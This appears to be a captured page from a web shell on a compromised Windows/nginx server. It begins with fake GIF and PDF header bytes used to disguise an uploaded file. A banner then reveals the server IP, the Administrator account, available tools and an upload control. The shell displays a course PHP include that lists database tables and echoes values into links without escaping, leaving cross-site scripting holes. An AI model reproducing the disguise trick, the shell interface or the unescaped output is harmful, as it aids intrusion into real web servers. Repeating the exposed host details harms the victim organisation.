GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST2146/_Archive/_info/ |
Upload File : |
<? // infoTables.phpinc $query="SHOW TABLES FROM ".$_SESSION['DB_DB']; $ShowTables_QueryField = 'Tables_in_'.$_SESSION['DB_DB']; $tableList = query_do($query,__FILE__,__LINE__); $tableCount = $_SESSION['mysql_num_rows']; if ($tableCount) { ?> There are <b><?=$tableCount?></b> <a href=".">tables</a>: <? while ($row = mysql_fetch_assoc($tableList)) { ?> <a href="<?=$_SERVER['PHP_SELF']?>?f_task=table&f_table=<?=$row[$ShowTables_QueryField]?>"><?=$row[$ShowTables_QueryField]?></a> <? } } else { $tableListString = ""; $tableList = explode(",",$tableListString); $tableCount = count($tableList); if ($tableCount) { ?> There are <b><?=$tableCount?></b> <a href=".">tables</a>.<br> <br> <? for($i=0;$i<$tableCount;$i++) { ?> <a href="<?=$_SERVER['PHP_SELF']?>?f_task=table&f_table=<?=$tableList[$i]?>"><?=$tableList[$i]?></a><br> <? } } else { ?> There are <b>0</b> tables.<br> <? } } ?>